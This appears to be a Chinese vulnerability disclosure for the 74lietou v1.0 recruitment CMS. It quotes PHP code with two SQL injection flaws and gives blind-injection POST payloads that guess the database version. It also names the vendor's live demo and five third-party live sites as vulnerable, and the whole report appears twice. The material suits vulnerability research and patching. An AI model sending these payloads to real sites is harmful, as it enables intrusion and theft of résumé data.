### 简要描述:
官网地址:http://74lietou.74cms.com/
### 详细说明:
在/plus/ajax_user.php中
```
elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空!"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); }
```
POST值过来,没有单引号包含,导致注入
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
POST值
```
param=12' ||%20left(version(),1)%20between%200%20and%205--%20a
```
这样猜解数据库版本第一位是0到5之间,返回已经选择此语言!
```
param=12' ||%20left(version(),1)%20between%200%20and%204--%20a
```
这样猜解数据库版本第一位是0到4之间,返回y
[<img src="https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg" alt="360截图-1870531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg)
[<img src="https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg" alt="360截图-1882703.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg)
第二处出现在/user/company/company_recruitment.php中
```
elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历!",1); if(!export_resume($yid)){ showmsg("导出失败!",0); }
```
跟踪export_resume
```
function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql);
```
$_REQUEST['y_id']没有被过滤
导致过滤,这个要登录而且要被审核就不用官网演示了本地测试!
[<img src="https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg" alt="360截图-2515750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg)
[<img src="https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg" alt="360截图-2536218.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg)
一样用POST值
```
' ||%20left(version(),1)%20between%200%20and%205--%20a
```
这样猜解数据库版本第一位是0到5之间
```
' ||%20left(version(),1)%20between%200%20and%204--%20a
```
这样猜解数据库版本第一位是0到4之间
这样的办法就可以注入了,这个不演示了
案例:
关键字Powered by 74lietou v1.0
```
http://www.5i5s.com/plus/ajax_user.php?act=only_check_language
http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language
http://www.haolietou.com/plus/ajax_user.php?act=only_check_language
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
http://www.elancejob.com/plus/ajax_user.php?act=only_check_language
```
### 漏洞证明:
在/plus/ajax_user.php中
```
elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空!"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); }
```
POST值过来,没有单引号包含,导致注入
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
POST值
```
param=12' ||%20left(version(),1)%20between%200%20and%205--%20a
```
这样猜解数据库版本第一位是0到5之间,返回已经选择此语言!
```
param=12' ||%20left(version(),1)%20between%200%20and%204--%20a
```
这样猜解数据库版本第一位是0到4之间,返回y
[<img src="https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg" alt="360截图-1870531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg)
[<img src="https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg" alt="360截图-1882703.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg)
第二处出现在/user/company/company_recruitment.php中
```
elseif($act =="export_resume") { $yid =!empty($_REQUEST['y_id'])?$_REQUEST['y_id']:showmsg("你没有选择简历!",1); if(!export_resume($yid)){ showmsg("导出失败!",0); }
```
跟踪export_resume
```
function export_resume($yid){ global $db; if(is_array($yid) && !empty($yid)) { $yid_str = implode(",", $yid); } else { $yid_str=$yid; } $oederbysql=" order BY refreshtime desc "; $wheresql = empty($wheresql)?" id in ({$yid_str}) ":" and id in ({$yid_str}) "; if (!empty($wheresql)) { $wheresql=" WHERE ".ltrim(ltrim($wheresql),'AND'); } $data = $db->getall("select * from ".table('resume').$wheresql);
```
$_REQUEST['y_id']没有被过滤
导致过滤,这个要登录而且要被审核就不用官网演示了本地测试!
[<img src="https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg" alt="360截图-2515750.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg)
[<img src="https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg" alt="360截图-2536218.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg)
一样用POST值74lietou v1.0最新绕过全局防御注入2处(官网演示)
这样的办法就可以注入了,这个不演示了
案例:
关键字Powered by 74lietou v1.0
```
http://www.5i5s.com/plus/ajax_user.php?act=only_check_language
http://lietou.hi772.com/plus/ajax_user.php?act=only_check_language
http://www.haolietou.com/plus/ajax_user.php?act=only_check_language
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
http://www.elancejob.com/plus/ajax_user.php?act=only_check_language
```
京公网安备 11010502034610号
暂无评论